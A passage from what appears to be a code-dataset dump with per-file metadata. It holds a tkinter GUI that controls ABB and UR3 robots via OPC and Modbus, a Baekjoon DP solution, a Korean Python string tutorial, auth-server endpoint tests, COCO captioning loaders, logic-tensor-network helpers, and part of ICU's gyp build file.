            modbus_client.write_register(133, 0)
        if can_ready == 1:
            opc_client.write((opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.sal_Lata', 1))
            modbus_client.write_register(131, 0)
            canvas_can.itemconfig(lamp_can, fill="green")
            # Bump the "total cans" counter shown in the entry widget.
            total_cans = int(entry_total_can.get()) + 1
            entry_total_can.delete(0, tk.END)
            entry_total_can.insert(0, total_cans)
        else:
            canvas_can.itemconfig(lamp_can, fill="white")
        if brick_ready == 1:
            opc_client.write((opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.sal_Brick', 1))
            modbus_client.write_register(132, 0)
            canvas_brick.itemconfig(lamp_brick, fill="green")
            # Bump the "total bricks" counter shown in the entry widget.
            total_bricks = int(entry_total_brick.get()) + 1
            entry_total_brick.delete(0, tk.END)
            entry_total_brick.insert(0, total_bricks)
        else:
            canvas_brick.itemconfig(lamp_brick, fill="white")
        # Re-arm the scan; stopping the scan flag ends the chain naturally.
        root.after(200, scan_variables)
def start_ur():
    """Command the UR process to start (register 128 = 1) and show green."""
    PROCESS_REGISTER = 128
    modbus_client.write_register(PROCESS_REGISTER, 1)
    canvas_process.itemconfig(lamp_process, fill='green')
def stop_ur():
    """Command the UR process to stop (register 128 = 0) and show red."""
    PROCESS_REGISTER = 128
    modbus_client.write_register(PROCESS_REGISTER, 0)
    canvas_process.itemconfig(lamp_process, fill='red')
def can():
    """Manually raise the ABB 'can dispatched' signal (sal_Lata)."""
    tag = opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.sal_Lata'
    print(opc_client.write((tag, 1)))
def brick():
    """Manually raise the ABB 'brick dispatched' signal (sal_Brick)."""
    tag = opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.sal_Brick'
    print(opc_client.write((tag, 1)))
def obj_sensor_sur():
    """Manually assert the object-on-surface flag in the UR (register 130)."""
    OBJ_SURFACE_REGISTER = 130
    modbus_client.write_register(OBJ_SURFACE_REGISTER, 1)
def obj_available():
    # Tell the ABB controller a new object is available ("sal_obj_nuevo");
    # the OPC write() result is printed for debugging.
    print(opc_client.write((opc_server_name[0] + '.IOSYSTEM.IOSIGNALS.sal_obj_nuevo', 1)))
opc_client = OpenOPC.client()
opc_server_name = opc_client.list()
modbus_client = ModbusTcpClient('127.0.0.1', 502)
scan = False
# ABB
label_connections = tk.Label(root, text="Connections")
label_connections.config(font=("TkDefaultFont", 14))
label_abb_title = tk.Label(root, text="IRB 140 (OPC DA)")
label_abb_title.config(font=("TkDefaultFont", 12))
label_abb_address = tk.Label(root, text="IP Address")
entry_abb_address = tk.Entry(root)
entry_abb_address.insert(0, "127.0.0.1")
button_scan_server_abb = tk.Button(root, text="Scan OPC servers", command=scan_abb, width=15, padx=5, pady=5)
label_abb_server = tk.Label(root, text="ABB Server:")
button_connect_abb = tk.Button(root, text="Connect", command=connect_abb, width=15, padx=5, pady=5)
label_status_abb = tk.Label(root, text="Status: Disconnected")
button_disconnect_abb = tk.Button(root, text="Disconnect", command=disconnect_abb, width=15, padx=5, pady=5)
canvas_status_abb = tk.Canvas(root, width=30, height=30)
lamp_status_abb = canvas_status_abb.create_oval(5, 5, 25, 25, fill='red')
# UR
label_ur_title = tk.Label(root, text="UR3 (MODBUS TCP IP)")
label_ur_title.config(font=("TkDefaultFont", 12))
label_ur_address = tk.Label(root, text="IP Address")
entry_ur_address = tk.Entry(root)
entry_ur_address.insert(0, "192.168.56.128")
button_scan_and_connect_server_ur = tk.Button(root, text="Connect", command=scan_and_connect_ur, width=15, padx=5,
pady=5)
label_ur_server = tk.Label(root, text="UR Server:")
button_disconnect_ur = tk.Button(root, text="Disconnect", command=disconnect_ur, width=15, padx=5, pady=5)
label_status_ur = tk.Label(root, text="Status: Disconnected")
canvas_status_ur = tk.Canvas(root, width=30, height=30)
lamp_status_ur = canvas_status_ur.create_oval(5, 5, 25, 25, fill='red')
# PLC
label_plc_title = tk.Label(root, text="PLC")
checkbox_plc_simulated = tk.Checkbutton(root, text="Simulated")
checkbox_plc_simulated.select()
label_plc_title.config(font=("TkDefaultFont", 12))
label_plc_address = tk.Label(root, text="IP Address")
entry_plc_address = tk.Entry(root)
entry_plc_address.insert(0, "192.168.0.108")
button_plc_connect = tk.Button(root, text="Connect", width=15, padx=5, pady=5)
button_plc_disconnect = tk.Button(root, text="Disconnect", width=15, padx=5, pady=5)
# SIGNALS
label_signals_title = tk.Label(root, text="Signals")
label_signals_title.config(font=("TkDefaultFont", 14))
button_start_scanning = tk.Button(root, text="Scan signals", command=lambda: set_scan(True), width=15, padx=5, pady=5)
canvas_scanning = tk.Canvas(root, width=30, height=30)
lamp_scanning = canvas_scanning.create_oval(5, 5, 25, 25, fill='red')
button_stop_scanning = tk.Button(root, text="Stop scanning", command=lambda: set_scan(False), width=15, padx=5, pady=5)
button_start_process = tk.Button(root, text="Start process", command=start_ur, width=15, padx=5, pady=5)
canvas_process = tk.Canvas(root, width=30, height=30)
lamp_process = canvas_process.create_oval(5, 5, 25, 25, fill='red')
button_stop_process = tk.Button(root, text="Stop process", command=stop_ur, width=15, padx=5, pady=5)
label_input = tk.Label(root, text="INPUT")
label_input.config(font=("TkDefaultFont", 12))
button_can = tk.Button(root, text="Can", command=can, width=15, padx=5, pady=5)
button_brick = tk.Button(root, text="Brick", command=brick, width=15, padx=5, pady=5)
button_obj_available = tk.Button(root, text="Obj available", command=obj_available, width=15, padx=5, pady=5)
button_obj_sensor_sur = tk.Button(root, text="Obj sensor sur", command=obj_sensor_sur, width=15, padx=5, pady=5)
label_output = tk.Label(root, text="OUTPUT")
label_output.config(font=("TkDefaultFont", 12))
label_can = tk.Label(root, text="Can")
canvas_can = tk.Canvas(root, width=30, height=30)
lamp_can = canvas_can.create_oval(5, 5, 25, 25, fill='white')
entry_total_can = tk.Entry(root, width=5)
entry_total_can.insert(0, 0)
label_brick = tk.Label(root, text="Brick")
canvas_brick = tk.Canvas(root, width=30, height=30)
lamp_brick = canvas_brick.create_oval(5, 5, 25, 25, fill='white')
entry_total_brick = tk.Entry(root, width=5)
entry_total_brick.insert(0, 0)
label_conveyor_fwd = tk.Label(root, text="Conveyor FWD")
canvas_conveyor_fwd = tk.Canvas(root, width=30, height=30)
lamp_conveyor_fwd = canvas_conveyor_fwd.create_oval(5, 5, 25, 25, fill='red')
label_conveyor_bwd = tk.Label(root, text="Conveyor BWD")
canvas_conveyor_bwd = tk.Canvas(root, width=30, height=30)
lamp_conveyor_bwd = canvas_conveyor_bwd.create_oval(5, 5, 25, 25, fill='red')
# ABB
label_connections.grid(sticky="W", row=2, column=2, padx=5, pady=5)
label_abb_title.grid(sticky="W", row=3, column=2, padx=5, pady=5, columnspan=3)
label_abb_address.grid(sticky="E", row=4, column=2, padx=5, pady=5)
entry_abb_address.grid(sticky="W", row=4, column=3, padx=5, pady=5, columnspan=2)
button_scan_server_abb.grid(sticky="W", row=5, column=2, padx=5, pady=5)
label_abb_server.grid(sticky="W", row=5, column=3, padx=5, pady=5, columnspan=2)
button_connect_abb.grid(sticky="W", row=6, column=2, padx=5, pady=5)
label_status_abb.grid(sticky="W", row=6, column=3, padx=5, pady=5)
canvas_status_abb.grid(sticky="W", row=6, column=4, padx=(5, 30))
button_disconnect_abb.grid(sticky="W", row=7, column=2, padx=5, pady=5)
# UR
label_ur_title.grid(sticky="W", row=9, column=2, padx=5, pady=5, columnspan=3)
label_ur_address.grid(sticky="E", row=10, column=2, padx=5, pady=5)
entry_ur_address.grid(sticky="W", row=10, column=3, padx=5, pady=5)
button_scan_and_connect_server_ur.grid(sticky="W", row=11, column=2, padx=5, pady=5, columnspan=2)
label_ur_server.grid(sticky="W", row=11, column=3, padx=5, pady=5, columnspan=2)
button_disconnect_ur.grid(sticky="W", row=12, column=2, padx=5, pady=5)
label_status_ur.grid(sticky="W", row=12, column=3, padx=5, pady=5)
canvas_status_ur.grid(sticky="W", row=12, column=4)
# PLC
label_plc_title.grid(sticky="W", row=14, column=2, padx=5, pady=5)
checkbox_plc_simulated.grid(sticky="W", row=14, column=3, padx=5, pady=5)
label_plc_address.grid(sticky="E", row=15, column=2, padx=5, pady=5)
entry_plc_address.grid(sticky="W", row=15, column=3, padx=5, pady=5)
button_plc_connect.grid(sticky="W", row=16, column=2, padx=5, pady=5)
button_plc_disconnect.grid(sticky="W", row=17, column=2, padx=5, pady=5)
# SIGNALS
label_signals_title.grid(sticky="W", row=2, column=7, padx=5, pady=5)
button_start_scanning.grid(sticky="W", row=4, column=7, padx=5, pady=5)
canvas_scanning.grid(sticky="W", row=4, column=8, padx=5, pady=5)
button_stop_scanning.grid(sticky="W", row=5, column=7, padx=5, pady=5)
button_start_process.grid(sticky="W", row=6, column=7, padx=5, pady=5)
canvas_process.grid(sticky="W", row=6, column=8, padx=5, pady=5)
button_stop_process.grid(sticky="W", row=7, column=7, padx=5, pady=5)
label_input.grid(sticky="W", row=9, column=7, padx=5, pady=(40, 5))
button_can.grid(sticky="W", row=10, column=7, padx=5, pady=5)
button_brick.grid(sticky="W", row=10, column=8, padx=5, pady=5, columnspan=2)
button_obj_sensor_sur.grid(sticky="W", row=11, column=7, padx=5, pady=5)
button_obj_available.grid(sticky="W", row=11, column=8, padx=5, pady=5, columnspan=2)
label_output.grid(sticky="W", row=13, column=7, padx=5, pady=5)
label_can.grid(sticky="W", row=14, column=7, padx=5, pady=5)
canvas_can.grid(sticky="W", row=14, column=8, padx=5, pady=5)
entry_total_can.grid(sticky="W", row=14, column=9, padx=5, pady=5)
label_brick.grid(sticky="W", row=15, column=7, padx=5, pady=5)
canvas_brick.grid(sticky="W", row=15, column=8, padx=5, pady=5)
entry_total_brick.grid(sticky="W", row=15, column=9, padx=5, pady=5)
label_conveyor_fwd.grid(sticky="W", row=16, column=7, padx=5, pady=5)
canvas_conveyor_fwd.grid(sticky="W", row=16, column=8, padx=5, pady=5)
label_conveyor_bwd.grid(sticky="W", row=17, column=7, padx=5, pady=5)
canvas_conveyor_bwd.grid(sticky="W", row=17, column=8, padx=5, pady=5)
root.mainloop()
| [
"lucazanrosso94@gmail.com"
] | lucazanrosso94@gmail.com |
1260bf85376667fd2991ee2aa31c34beadda002a | 7872ca984d8e5809fee3868810febdd3273c8787 | /BOJ/dynamic_programming/11057-오르막_수.py | 39063cd46ab976b7293b76bc1013fb3ddfbb90f9 | [] | no_license | hwamoc/Algorithm | dcc99252b3a444aecf62544fdc5282c8a1a8de3d | 4b9c086b0807736e80ce0e8da8415865cb555921 | refs/heads/master | 2022-12-24T05:11:10.044203 | 2020-10-05T09:43:43 | 2020-10-05T09:43:43 | 277,570,498 | 0 | 0 | null | 2020-10-05T09:43:44 | 2020-07-06T14:51:39 | Python | UTF-8 | Python | false | false | 864 | py | '''
# 예제 입력 1
1
# 예제 입력 2
2
# 예제 입력 3
3
'''
from sys import stdin
input = stdin.readline
# BOJ 11057 "ascending numbers": count length-N digit strings whose digits
# are non-decreasing left to right, modulo 10007.
# nc[i][j] = number of i-digit ascending numbers ending with digit j, with
#   nc[i][j] = nc[i-1][j] + nc[i][j-1]
# (extend a length-(i-1) number ending in j, or raise the last digit to j).
N = int(input())
mod = 10007
# Base row: every single digit 0..9 is itself an ascending number.
nc = [[1]*10 for _ in range(N+1)]
for i in range(2, N+1):
    for j in range(1, 10):
        nc[i][j] = (nc[i-1][j] + nc[i][j-1]) % mod
# Print ONLY the answer: the debug `print(nc)` statements were removed —
# extra output lines would be judged as a wrong answer.
print(sum(nc[N]) % mod)
'''
N = int(input())
nums = [1] * 10
mod = 10007
for _ in range(N-1):
for i in range(1, 10):
nums[i] = (nums[i] + nums[i-1]) % mod
print(nums[i])
print("--------------")
sys.stdout.write(str(sum(nums) % mod))
'''
'''
k=int(input())
result=1
for i in range(9+k,9,-1):
result*=i
for i in range(1,k+1):
result//=i
print(result%10007)
''' | [
"hwamok222@naver.com"
] | hwamok222@naver.com |
856646a13abfa675fe8af4f6c9cf65e07f64f447 | 6d5a5c731f89933c7086ecd7d26999b79bc7217a | /Inflearn/stringPrac.py | 33b9bd610fc6fd0e93387a7b9f24ecaa77075782 | [] | no_license | minhyeonlee/python-basic | 7fbb9ff3816ac72c19d2cb2192c324a379082b16 | 007d1fc455927e83188e345bf3fc5cd8d5753b49 | refs/heads/master | 2022-04-13T09:57:39.270863 | 2020-03-28T07:25:14 | 2020-03-28T07:25:14 | 247,428,424 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,306 | py | '''
Inflearn, free Python lecture (basics) - "Become a developer in 6 hours"
Section 3. String handling
'''
# Lesson 1. Strings
# Both '...' and "..." are string literals.
sentence = '나는 소년입니다.'
print(sentence)
sentence2 = "파이썬은 쉬워요"
print(sentence2)
# Triple quotes can store (and print) multiple lines.
sentence3 = '''
나는 소년이고,
파이썬은 쉬워요
'''
print(sentence3)
# Lesson 2. Slicing
idnumber = "990120-1234567"
print("성별: " + idnumber[7]) # index 7 -> "1" (gender digit)
print("연: " + idnumber[0:2]) # indices 0 up to (not including) 2 -> "99"
print("월: " + idnumber[2:4]) # "01"
print("일: " + idnumber[4:6]) # "20"
print("생년월일: " + idnumber[:6]) # from the start up to (not including) index 6
print("뒤 7자리: "+ idnumber[7:]) # from index 7 to the end
print("뒤 7자리 (뒤에서부터): " + idnumber[-7:]) # last 7 characters, counted from the back
# Lesson 3. String methods
python = "Python is Amazing"
print(python.lower()) # all lowercase
print(python.upper()) # all uppercase
print(python[0].isupper()) # is python[0] an uppercase letter? returns True/False
print(len(python)) # length of the string
print(python.replace("Python", "Java")) # find a substring and replace it with another
index = python.index("n") # position of the first occurrence of the substring
print(index)
index = python.index("n", index+1) # search again, starting just after the "n" found at 5
print(index)
print(python.find("n")) # searches like index()
print(python.find("Java")) # returns -1 when the substring is absent
# print(python.index("Java")) would raise an error instead
print(python.count("n")) # how many times the substring occurs
# Lesson 4. String formatting
print("a" + "b")
print("a", "b")
# Method 1: %-formatting
print("나는 %d살입니다." % 20) # %d: integer
print("나는 %s을 좋아해요." % "파이썬") # %s: string (numbers can be formatted too)
print("Apple은 %c로 시작해요." % "A") # %c: a single character
print("나는 %s살입니다." % 20)
print("나는 %s색과 %s색을 좋아해요." %("파란", "빨간"))
# Method 2: str.format with positional slots
print("나는 {}살 입니다.".format(20))
print("나는 {}색과 {}색을 좋아해요.".format("파란", "빨간"))
print("나는 {0}색과 {1}색을 좋아해요.".format("파란", "빨간"))
print("나는 {1}색과 {0}색을 좋아해요.".format("파란", "빨간"))
# Method 3: str.format with named slots
print("나는 {age}살이며, {color}색을 좋아해요.".format(age=30, color="빨간"))
print("나는 {age}살이며, {color}색을 좋아해요.".format(color="빨간", age=30))
# Method 4: f-strings (available from Python 3.6)
age = "20"
color ="빨간"
print(f"나는 {age}살이며, {color}색을 좋아해요.")
# Lesson 5. Escape characters
# \n: newline
print("백문이 불여일견\n백견이 불여일타")
# \" \': quote characters inside a string
# target output: 저는 "나도코딩"입니다.
print("저는 '나도코딩'입니다.")
print('저는 "나도코딩"입니다.')
print("저는 \"나도코딩\"입니다.")
print("저는 \'나도코딩\'입니다.")
# \\: a literal backslash (useful when printing paths, etc.)
print("C:\\User\\Desktop")
# \r: carriage return, moves the cursor back to the start of the line
print("Red Apple\rPine")
# \b: backspace (erases one character)
print("Redd\bApple")
# \t: tab
print("Red\tApple")
"minhyeonlee1@gmail.com"
] | minhyeonlee1@gmail.com |
1d8f707d85637cff428c5a8591200c9101f5dd02 | 7347e21b270b67bcc5820e5c285921f6edafbcb4 | /src/tests/resources/test_app_server.py | 52528296068fab3dc158d3765da69c139aa10c23 | [] | no_license | taller2fiuba/chotuve-auth-server | 21b2db4ae034883033ea8aa860347567ab9b8473 | 882ac7cb52a6c4cf81ed3bd4d59b643a73078054 | refs/heads/master | 2023-04-18T21:15:34.085832 | 2020-07-31T00:51:09 | 2020-07-31T00:51:09 | 257,125,839 | 0 | 0 | null | 2021-05-06T20:14:23 | 2020-04-19T23:45:26 | Python | UTF-8 | Python | false | false | 3,844 | py | import unittest
import mock
from app import app
from tests.base import BaseTestCase
class AppServerTestCase(BaseTestCase):
    """Integration tests for the /app-server admin endpoints.

    Covers listing, pagination validation, lookup by id, registration
    (token issuance), deletion, and app-server session validation.
    """
    def setUp(self):
        """Patch admin-token validation so every request is authorized."""
        super().setUp()
        patcher = mock.patch('app.autenticacion.validar_admin_token')
        mock_validar_admin_token = patcher.start()
        # Any admin token is accepted for the duration of each test.
        mock_validar_admin_token.return_value = True
        self.addCleanup(patcher.stop)
    def test_get_devuelve_vacio_sin_app_servers(self):
        """GET with no registered app-servers returns 200 and an empty list."""
        response = self.app.get('/app-server')
        self.assertEqual(200, response.status_code)
        self.assertEqual([], response.json)
    def test_get_devuelve_app_servers(self):
        """GET lists a previously registered app-server with its url/name."""
        self.app.post('/app-server', json={'url': 'url', 'nombre': 'nombre'})
        response = self.app.get('/app-server')
        self.assertEqual(200, response.status_code)
        self.assertEqual(1, len(response.json))
        self.assertEqual('url', response.json[0]['url'])
        self.assertEqual('nombre', response.json[0]['nombre'])
    def test_get_devuelve_400_en_paginado_erroneo(self):
        """Non-numeric offset/cantidad pagination params yield 400."""
        response = self.app.get('/app-server?offset=casa&cantidad=coso')
        self.assertEqual(400, response.status_code)
    def test_get_devuelve_app_server_por_id(self):
        """GET /app-server/<id> returns the registered server's data."""
        r = self.app.post('/app-server', json={'url': 'url', 'nombre': 'nombre'})
        app_id = r.json['id']
        response = self.app.get(f'/app-server/{app_id}')
        self.assertEqual(200, response.status_code)
        self.assertEqual('url', response.json['url'])
        self.assertEqual('nombre', response.json['nombre'])
    def test_get_devuelve_404_en_id_inexistente(self):
        """GET with an unknown id yields 404."""
        response = self.app.get('/app-server/123')
        self.assertEqual(404, response.status_code)
    def test_post_devuelve_nuevo_token_de_app_server(self):
        """Registering an app-server returns 201 plus an access token."""
        response = self.app.post('/app-server', json={'url': 'url', 'nombre': 'nombre'})
        self.assertEqual(201, response.status_code)
        self.assertIn('token', response.json)
    def test_post_devuelve_400_si_ya_existe_url(self):
        """Registering the same url twice fails with 400."""
        response = self.app.post('/app-server', json={'url': 'url', 'nombre': 'nombre'})
        response = self.app.post('/app-server', json={'url': 'url', 'nombre': 'nombre'})
        self.assertEqual(400, response.status_code)
    def test_post_devuelve_400_si_faltan_datos(self):
        """Missing url, missing name, or empty body all yield 400."""
        response = self.app.post('/app-server', json={'url': 'url'})
        self.assertEqual(400, response.status_code)
        response = self.app.post('/app-server', json={'nombre': 'nombre'})
        self.assertEqual(400, response.status_code)
        response = self.app.post('/app-server')
        self.assertEqual(400, response.status_code)
    def test_delete_devuelve_404_si_no_existe_app_server(self):
        """DELETE with an unknown id yields 404."""
        response = self.app.delete('/app-server/123')
        self.assertEqual(404, response.status_code)
    def test_delete_elimina_app_server_correctamente(self):
        """DELETE on an existing app-server succeeds with 200."""
        r = self.app.post('/app-server', json={'url': 'url', 'nombre': 'nombre'})
        app_id = r.json['id']
        response = self.app.delete(f'/app-server/{app_id}')
        self.assertEqual(200, response.status_code)
    def test_get_sesion_devuelve_200_en_token_valido(self):
        """Session check accepts the token issued at registration."""
        # Disable the test-mode token bypass so validation really runs.
        app.config['IGNORAR_APP_SERVER_TOKEN'] = False
        r = self.app.post('/app-server', json={'url': 'url', 'nombre': 'nombre'})
        self.assertEqual(201, r.status_code)
        app_token = r.json['token']
        response = self.app.get('/app-server/sesion', headers={'X-APP-SERVER-TOKEN': app_token})
        self.assertEqual(200, response.status_code)
    def test_get_sesion_devuelve_401_en_token_invalido(self):
        """Session check rejects an unknown token with 401."""
        # Disable the test-mode token bypass so validation really runs.
        app.config['IGNORAR_APP_SERVER_TOKEN'] = False
        response = self.app.get('/app-server/sesion', headers={'X-APP-SERVER-TOKEN': 'invalido'})
        self.assertEqual(401, response.status_code)
if __name__ == '__main__':
unittest.main()
| [
"sportelliluciano@gmail.com"
] | sportelliluciano@gmail.com |
cb42037c53fdb36811de199c77965b36a6d8534e | 65f98765b5e9ebe971c494af0b37a230757a00f1 | /HW4/coco_utils.py | 9cd8c99290b72619099b46c5a1c792bd22cec088 | [] | no_license | BingqianY/EECS-545-Machine-Learning | 01112686a8c6eb4a60a2454018708a96a37b7caa | 7a511b3936b34b7c130368241577b282edb5e8a7 | refs/heads/master | 2022-12-09T15:40:13.807210 | 2020-09-07T17:18:08 | 2020-09-07T17:18:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,923 | py | from builtins import range
import os, json
import numpy as np
import h5py
BASE_DIR = 'coco_captioning'
def load_coco_data(base_dir=BASE_DIR,
                   max_train=None,
                   pca_features=True):
    """Load the preprocessed COCO-2014 captioning dataset from disk.

    Args:
        base_dir: directory containing the .h5 / .json / .txt data files.
        max_train: if not None, randomly subsample this many training
            caption/image pairs (np.random.randint samples WITH
            replacement, so duplicates are possible).
        pca_features: load the PCA-reduced VGG16 fc7 feature files
            instead of the full-dimensional ones.

    Returns:
        dict mapping names to arrays/values: every dataset found in the
        captions HDF5 file, 'train_features', 'val_features', every key of
        the vocabulary JSON, 'train_urls' and 'val_urls'.
    """
    data = {}
    # Copy every dataset in the captions HDF5 file into memory.
    caption_file = os.path.join(base_dir, 'coco2014_captions.h5')
    with h5py.File(caption_file, 'r') as f:
        for k, v in f.items():
            data[k] = np.asarray(v)
    # Training image features: PCA-reduced or full VGG16 fc7 activations.
    if pca_features:
        train_feat_file = os.path.join(base_dir, 'train2014_vgg16_fc7_pca.h5')
    else:
        train_feat_file = os.path.join(base_dir, 'train2014_vgg16_fc7.h5')
    with h5py.File(train_feat_file, 'r') as f:
        data['train_features'] = np.asarray(f['features'])
    # Validation image features, same PCA choice as above.
    if pca_features:
        val_feat_file = os.path.join(base_dir, 'val2014_vgg16_fc7_pca.h5')
    else:
        val_feat_file = os.path.join(base_dir, 'val2014_vgg16_fc7.h5')
    with h5py.File(val_feat_file, 'r') as f:
        data['val_features'] = np.asarray(f['features'])
    # Vocabulary mappings (JSON) are merged into the same dict.
    dict_file = os.path.join(base_dir, 'coco2014_vocab.json')
    with open(dict_file, 'r') as f:
        dict_data = json.load(f)
        for k, v in dict_data.items():
            data[k] = v
    # Image URLs, one per line in the text files.
    train_url_file = os.path.join(base_dir, 'train2014_urls.txt')
    with open(train_url_file, 'r') as f:
        train_urls = np.asarray([line.strip() for line in f])
    data['train_urls'] = train_urls
    val_url_file = os.path.join(base_dir, 'val2014_urls.txt')
    with open(val_url_file, 'r') as f:
        val_urls = np.asarray([line.strip() for line in f])
    data['val_urls'] = val_urls
    # Maybe subsample the training data
    if max_train is not None:
        num_train = data['train_captions'].shape[0]
        mask = np.random.randint(num_train, size=max_train)
        data['train_captions'] = data['train_captions'][mask]
        data['train_image_idxs'] = data['train_image_idxs'][mask]
    return data
def decode_captions(captions, idx_to_word):
    """Turn integer-encoded captions back into space-joined strings.

    Args:
        captions: 1-D array (one caption) or 2-D array (batch of captions)
            of vocabulary indices.
        idx_to_word: sequence/mapping from index to token string.

    Returns:
        A single string for 1-D input, otherwise a list of strings.
        '<NULL>' tokens are dropped; decoding stops after the first
        '<END>' token (which is kept in the output).
    """
    was_single = captions.ndim == 1
    if was_single:
        captions = captions[None]

    sentences = []
    for row in captions:
        tokens = []
        for idx in row:
            token = idx_to_word[idx]
            if token != '<NULL>':
                tokens.append(token)
            if token == '<END>':
                break
        sentences.append(' '.join(tokens))

    return sentences[0] if was_single else sentences
def sample_coco_minibatch(data, batch_size=100, split='train', seed = None):
    """Sample a random minibatch of (caption, feature, url) triples.

    Args:
        data: dict as returned by load_coco_data.
        batch_size: number of captions to draw (with replacement).
        split: 'train' or 'val'; selects which arrays are sampled.
        seed: optional int; if given, the RNG is seeded for reproducibility.

    Returns:
        (captions, image_features, urls) aligned along the first axis.
    """
    # BUGFIX: `if seed:` silently ignored seed=0; test against None instead
    # so every explicit seed value takes effect.
    if seed is not None:
        np.random.seed(seed)
    split_size = data['%s_captions' % split].shape[0]
    # Caption indices, sampled with replacement.
    mask = np.random.choice(split_size, batch_size)
    captions = data['%s_captions' % split][mask]
    # Each caption maps to an image; fetch that image's features and URL.
    image_idxs = data['%s_image_idxs' % split][mask]
    image_features = data['%s_features' % split][image_idxs]
    urls = data['%s_urls' % split][image_idxs]
    return captions, image_features, urls
| [
"noreply@github.com"
] | noreply@github.com |
037e7c688589c6f62e908de38bbd66aa0d06136a | affe5181dc52444c81b0ed353b4d02dadb4fb9f5 | /logictensornetworks_library.py | 2623e17ac3dfcb97d06ea025f6e2e85c7df4e675 | [
"MIT"
] | permissive | gilbeckers/logictensornetworks | d52ae9e856bd35508139e26cb45397be9824cc2c | c4cc3628db91030230c78d3b964c26304a3b452b | refs/heads/master | 2021-01-02T17:40:28.714759 | 2020-02-13T09:36:21 | 2020-02-13T09:36:21 | 239,727,377 | 0 | 0 | MIT | 2020-02-11T09:49:24 | 2020-02-11T09:49:23 | null | UTF-8 | Python | false | false | 334 | py | import tensorflow as tf
def equal_simple(x,y):
    # Fuzzy (graded) equality: exp(-L1 distance) per row, in (0, 1];
    # 1.0 iff x == y. keepdims=True keeps a trailing size-1 axis.
    # NOTE(review): reduction over axis 1 assumes rank-2 inputs — confirm.
    return tf.exp(-tf.reduce_sum(tf.abs(x-y),1,keepdims=True))
# Default smoothing diameter for equal_euclidian; since the score is
# exp(-distance/diameter), a larger diameter makes the predicate more tolerant.
default_equal_diameter = 1.0
def equal_euclidian(t_1,t_2,diameter=default_equal_diameter):
    # Fuzzy equality from Euclidean (L2) distance per row:
    # exp(-||t_1 - t_2||_2 / diameter), in (0, 1]; 1.0 iff t_1 == t_2.
    # NOTE(review): reduction over axis 1 assumes rank-2 inputs — confirm.
    delta = tf.sqrt(tf.reduce_sum(tf.square(tf.subtract(t_1,t_2)),1,keepdims=True))
    return tf.exp(-tf.divide(delta,diameter))
| [
"spranger@nova"
] | spranger@nova |
671c07d1bae3bbeba7c5b48667c2e1e16124ad39 | 600df3590cce1fe49b9a96e9ca5b5242884a2a70 | /third_party/icu/icu.gyp | 4e3c0063727072f7e4a288d3da375b851154b2a4 | [
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unicode",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"NAIST-2003",
"ICU"
] | permissive | metux/chromium-suckless | efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a | 72a05af97787001756bae2511b7985e61498c965 | refs/heads/orig | 2022-12-04T23:53:58.681218 | 2017-04-30T10:59:06 | 2017-04-30T23:35:58 | 89,884,931 | 5 | 3 | BSD-3-Clause | 2022-11-23T20:52:53 | 2017-05-01T00:09:08 | null | UTF-8 | Python | false | false | 23,500 | gyp | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'includes': [
'icu.gypi',
],
'variables': {
'use_system_icu%': 0,
'icu_use_data_file_flag%': 0,
'want_separate_host_toolset%': 1,
},
'target_defaults': {
'direct_dependent_settings': {
'defines': [
# Tell ICU to not insert |using namespace icu;| into its headers,
# so that chrome's source explicitly has to use |icu::|.
'U_USING_ICU_NAMESPACE=0',
# We don't use ICU plugins and dyload is only necessary for them.
# NaCl-related builds also fail looking for dlfcn.h when it's enabled.
'U_ENABLE_DYLOAD=0',
# With exception disabled, MSVC emits C4577 warning on coming across
# 'noexcept'. See http://bugs.icu-project.org/trac/ticket/12406
# TODO(jshin): Remove this when updating to a newer version with this
# fixed.
'U_NOEXCEPT=',
],
},
'defines': [
'U_USING_ICU_NAMESPACE=0',
'HAVE_DLOPEN=0',
# Only build encoding coverters and detectors necessary for HTML5.
'UCONFIG_ONLY_HTML_CONVERSION=1',
# No dependency on the default platform encoding.
# Will cut down the code size.
'U_CHARSET_IS_UTF8=1',
],
'conditions': [
['component=="static_library"', {
'defines': [
'U_STATIC_IMPLEMENTATION',
],
}],
['(OS=="linux" or OS=="freebsd" or OS=="openbsd" or OS=="solaris" \
or OS=="netbsd" or OS=="mac" or OS=="android" or OS=="qnx") and \
(target_arch=="arm" or target_arch=="ia32" or \
target_arch=="mipsel" or target_arch=="mips")', {
'target_conditions': [
['_toolset=="host"', {
'cflags': [ '-m32' ],
'ldflags': [ '-m32' ],
'asflags': [ '-32' ],
'xcode_settings': {
'ARCHS': [ 'i386' ],
},
}],
],
}],
['(OS=="linux" or OS=="freebsd" or OS=="openbsd" or OS=="solaris" \
or OS=="netbsd" or OS=="mac" or OS=="android" or OS=="qnx") and \
(target_arch=="arm64" or target_arch=="x64" or \
target_arch=="mips64el" or target_arch=="mips64")', {
'target_conditions': [
['_toolset=="host"', {
'cflags': [ '-m64' ],
'ldflags': [ '-m64' ],
'asflags': [ '-64' ],
'xcode_settings': {
'ARCHS': [ 'x86_64' ],
},
}],
],
}],
],
'include_dirs': [
'source/common',
'source/i18n',
],
'msvs_disabled_warnings': [4005, 4068, 4355, 4996, 4267],
},
'conditions': [
['use_system_icu==0 or want_separate_host_toolset==1', {
'targets': [
{
'target_name': 'copy_icudt_dat',
'type': 'none',
# icudtl.dat is the same for both host/target, so this only supports a
# single toolset. If a target requires that the .dat file be copied
# to the output directory, it should explicitly depend on this target
# with the host toolset (like copy_icudt_dat#host).
'toolsets': [ 'host' ],
'copies': [{
'destination': '<(PRODUCT_DIR)',
'conditions': [
['OS == "android"', {
'files': [
'android/icudtl.dat',
],
} , { # else: OS != android
'conditions': [
# Big Endian
[ 'target_arch=="mips" or target_arch=="mips64"', {
'files': [
'common/icudtb.dat',
],
} , { # else: ! Big Endian = Little Endian
'files': [
'common/icudtl.dat',
],
}],
],
}],
],
}],
},
{
'target_name': 'data_assembly',
'type': 'none',
'conditions': [
